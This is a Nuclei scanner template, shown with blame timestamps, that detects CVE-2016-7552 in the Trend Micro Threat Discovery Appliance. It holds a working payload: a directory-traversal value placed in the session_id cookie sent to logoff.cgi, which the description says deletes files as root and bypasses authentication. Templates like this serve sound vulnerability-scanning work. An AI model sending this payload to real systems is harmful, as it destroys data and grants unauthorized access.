nuclei-templates/cves/2016/CVE-2016-7552.yaml

26 lines
863 B
YAML
Raw Normal View History

2021-02-23 21:19:32 +00:00
id: CVE-2016-7552
info:
name: Trend Micro Threat Discovery Appliance Auth Bypass via Directory Traversal
author: dwisiswant0
severity: critical
2021-04-22 09:06:27 +00:00
description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
2021-02-23 21:19:32 +00:00
reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
2021-03-18 07:54:36 +00:00
tags: cve,cve2016,lfi
2021-02-23 21:19:32 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/logoff.cgi"
headers:
Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2021-03-10 08:52:33 +00:00
- "Memory map"
part: body